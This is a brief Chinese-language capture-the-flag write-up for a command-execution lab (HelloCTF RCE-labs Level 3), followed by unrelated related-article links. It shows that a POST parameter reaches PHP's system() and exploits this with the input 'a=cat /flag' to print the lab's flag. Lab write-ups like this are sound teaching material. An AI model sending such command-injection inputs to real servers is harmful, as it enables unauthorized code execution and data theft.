HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST'a');

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
HackTwoHub8 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
BomanZQT10 小时前
NSK PSS2020N1D1435 精密滚珠丝杠技术手册
经验分享·规格说明书
ccino .10 小时前
Hackerone-地址栏xss
网络安全·xss
fofantasy10 小时前
NSK超重载高速静音滚珠丝杠技术解析
经验分享·规格说明书
数据知道11 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg66611 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
德思特12 小时前
从靠天吃饭到科技种田,虹科&德思特与极飞科技聊聊农业无人机不迷路的 “硬核底气“
经验分享
红信鸽12 小时前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全
郑州光合科技余经理12 小时前
海外外卖平台源码改造实战——多语言核心代码实现
java·开发语言·前端·后端·mysql·架构·php
法雅特吉他13 小时前
吉他面板材质技术解析:合板 vs 面单 vs 全单
经验分享·新媒体运营·学习方法·材质·内容运营